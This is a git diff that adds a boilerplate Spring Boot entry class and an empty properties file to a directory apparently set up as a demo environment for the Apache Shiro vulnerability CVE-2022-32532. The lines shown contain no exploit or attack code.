diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
--
Gitee